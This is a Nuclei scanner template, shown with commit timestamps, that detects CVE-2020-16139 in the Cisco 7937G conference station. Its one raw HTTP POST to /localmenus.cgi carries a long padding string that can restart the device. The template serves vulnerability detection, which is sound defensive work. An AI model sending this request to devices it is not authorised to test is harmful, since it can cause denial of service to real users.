nuclei-templates/http/cves/2020/CVE-2020-16139.yaml

52 lines
2.3 KiB
YAML
Raw Normal View History

id: CVE-2020-16139
info:
name: Cisco Unified IP Conference Station 7937G - Denial-of-Service
author: pikpikcu
severity: high
2021-03-24 06:51:54 +00:00
description: |
Cisco Unified IP Conference Station 7937G 1-4-4-0 through 1-4-5-7 allows attackers to restart the device remotely via specially crafted packets that can cause a denial-of-service condition. Note: We cannot prove this vulnerability exists. Out of an abundance of caution, this CVE is being assigned to better serve our customers and ensure all who are still running this product understand that the product is end of life and should be removed or upgraded.
2023-09-27 15:51:13 +00:00
impact: |
An attacker can exploit this vulnerability to disrupt the functionality of the conference station, leading to a denial of service for legitimate users.
2023-09-06 12:22:36 +00:00
remediation: |
Apply the latest firmware update provided by Cisco to mitigate this vulnerability.
reference:
- http://packetstormsecurity.com/files/158819/Cisco-7937G-Denial-Of-Service.html
- https://www.cisco.com/c/en/us/products/collateral/collaboration-endpoints/unified-ip-phone-7940g/end_of_life_notice_c51-729487.html
- https://nvd.nist.gov/vuln/detail/CVE-2020-16139
- https://github.com/anonymous364872/Rapier_Tool
- https://github.com/blacklanternsecurity/Cisco-7937G-PoCs
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
cvss-score: 7.5
cve-id: CVE-2020-16139
2024-05-31 19:23:20 +00:00
epss-score: 0.05724
epss-percentile: 0.93341
2023-09-06 12:22:36 +00:00
cpe: cpe:2.3:o:cisco:unified_ip_conference_station_7937g_firmware:*:*:*:*:*:*:*:*
metadata:
max-request: 1
2023-07-11 19:49:27 +00:00
vendor: cisco
product: unified_ip_conference_station_7937g_firmware
tags: cve,cve2020,dos,cisco,packetstorm
http:
- raw:
- |
POST /localmenus.cgi?func=609&rphl=1&data=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA HTTP/1.1
Host: {{Hostname}}
matchers-condition: and
matchers:
- type: word
part: header
words:
- "application/xml"
2023-07-11 19:49:27 +00:00
- type: word
words:
- 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
2023-07-11 19:49:27 +00:00
- type: status
status:
- 200
# digest: 490a00463044022064bf3659fada478043467e0b827681d9b6c1d684ad21bd10712526371d22b0f00220432d723f568bb4b89fc6924e53d733834abb0727932f1f4fe54fcd3ac1db415a:922c64590222798bb761d5b6d8e72950